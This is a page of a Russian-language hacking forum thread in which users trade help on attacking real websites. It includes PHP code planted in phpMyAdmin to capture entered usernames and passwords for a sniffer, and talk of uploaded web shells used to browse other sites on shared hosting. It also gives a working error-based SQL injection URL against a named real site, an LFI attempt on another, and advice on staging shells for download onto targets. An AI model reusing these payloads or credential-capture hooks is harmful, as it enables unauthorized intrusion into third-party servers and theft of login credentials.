Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Там через консоль? Если да то какую команду вбить? :rolleyes:
     
  2. jasp3r

    jasp3r New Member

    Joined:
    23 Apr 2012
    Messages:
    44
    Likes Received:
    4
    Reputations:
    0
    WendM
    если права на чтение есть то без консоли домашняя должна быть видна
    можно и через консоль: ls -l -a
     
  3. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    права есть, и все я вижу. Суть в том что там много папок, в них папки сайтов, название папки=домен сайта. Так вот, что бы мне руками не шустрить все папки, и не выписывать все домены, я хочу вызвать дерево директорий, потом спарсить названия доменов ;)
    только почему то ноль реакции.
    P.S Сижу под пользователем Apache.
     
  4. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Как отослать на снифер пароль введенный в phpmyadmin? Тренируюсь на локалки, для теста добавил в index.php
    PHP:
    if (isset($_POST['pma_username'])) 
    {
    $get_user=$_POST['pma_username'];
    echo 
    $post_user;
    }
    if (isset(
    $_POST['pma_password'])) 

    $get_pass=$_POST['pma_password'];
    echo 
    $post_pass;
    }
    но ни чего не выходит, переменные $get_pass $get_user пустые. Что не так?
     
  5. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862

    А если так ?

    PHP:
     if (isset($_POST['pma_username']))  

    $get_user=$_POST['pma_username']; 
    echo 
    $get_user

    if (isset(
    $_POST['pma_password']))  
    {  
    $get_pass=$_POST['pma_password']; 
    echo 
    $get_pass
    $get_pass и $get_user как раз не пустые, а вот выводимые на экран данные $post_pass $post_user - пустые.
     
    _________________________
  6. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    ой, я тупанул. Просто забыл переименовать когда сюда постил. Т.е $get_pass= $post_pass и $get_user=$post_user.
    А так вопрос решен, там в индексе инклуидится common.inc.php, вот в него и прописываем (в самое начало)

    PHP:
     if (isset($_POST['pma_username']))  

    $get_user=$_POST['pma_username']; 
    echo 
    $get_user

    if (isset(
    $_POST['pma_password']))  
    {  
    $get_pass=$_POST['pma_password']; 
    echo 
    $get_pass
    Всем спасибо за внимание ;)
     
  7. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Странно, залил шел на другой сайт, права теже, но редактирую спокойно любые файлы сайта. В чем фишка ?
    На том сайте где не могу редактировать сижу под пользователем Apache, могу ходить по всем сайтам на хостинге :D
     
    #21007 WendM, 22 Aug 2012
    Last edited: 22 Aug 2012
  8. foma9999

    foma9999 New Member

    Joined:
    5 Jan 2010
    Messages:
    83
    Likes Received:
    2
    Reputations:
    -5
    http://myrusland.ru/maps_regions_'.htm

    Все попытки раскрутить не приводили к успеху, вроде как всего 1 таблица, хотя я могу ошибаться.
     
  9. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    http://myrusland.ru/maps_regions_'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1+--+.htm
     
  10. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Элементарно же, Ватсон. Значит apache не является создателем для того файла, что ты редактируешь. А пользователь на другом сервере - является.
     
    _________________________
  11. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Что-то не могу раскрутить LFI:

    Code:
    http://www.discuta.ro/forum/forumList.php?view=
    
     
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    это не LFI, это читалка, но файл перед выводом проходит через loadXML() - который ждет валидного XML а, поэтому фейлит парсинг, и вам ничего не выводит
     
    _________________________
    1 person likes this.
  13. Teratex

    Teratex New Member

    Joined:
    13 Mar 2012
    Messages:
    28
    Likes Received:
    3
    Reputations:
    5
    MaxFast
    Если интересно то есть скуль в пост запросе

     
    #21013 Teratex, 26 Aug 2012
    Last edited: 26 Aug 2012
  14. qq6ka

    qq6ka Banned

    Joined:
    21 May 2010
    Messages:
    35
    Likes Received:
    19
    Reputations:
    21
    На какой сервис можно временно залить шелл, чтобы стянуть его оттуда на нужный сайт?
     
  15. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    qq6ka, народ, я.диск, гугл драйв etc...
     
    _________________________
  16. qq6ka

    qq6ka Banned

    Joined:
    21 May 2010
    Messages:
    35
    Likes Received:
    19
    Reputations:
    21
    народ капчу просит распознавать.
    через wget же не получится тогда?
     
  17. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Я имел в виду сайт на народе.
     
    _________________________
  18. qq6ka

    qq6ka Banned

    Joined:
    21 May 2010
    Messages:
    35
    Likes Received:
    19
    Reputations:
    21
    Понял, спасибо. И ещё, на каком сайте можно закодировать текс, чтоб мускуль скушал?
     
  19. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    qq6ka, смотря как кодировать, я юзаю собственный
     
    _________________________
    #21019 VY_CMa, 26 Aug 2012
    Last edited: 28 Sep 2012
  20. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    Помогите как инклудить при данной ошибке?
    Warning: include(G.php) [function.include]: failed to open stream: Операция не позволяется in /var/www/x/x/x/x/x/x/index.php on line 71

    Warning: include(G.php) [function.include]: failed to open stream: Операция не позволяется in /var/www/x/x/x/x/x/x/index.php on line 71

    Warning: include() [function.include]: Failed opening 'G.php' for inclusion (include_path='.:') in /var/www/x/x/x/x/x/x/index.php on line 71
    Ссылка такого вида:

    http://site.ru/dir/index.php?print&id=669
    изменяю '669' выдазит уже mysql ошибка ,а мне нужен очень инклуд
     
Thread Status:
Not open for further replies.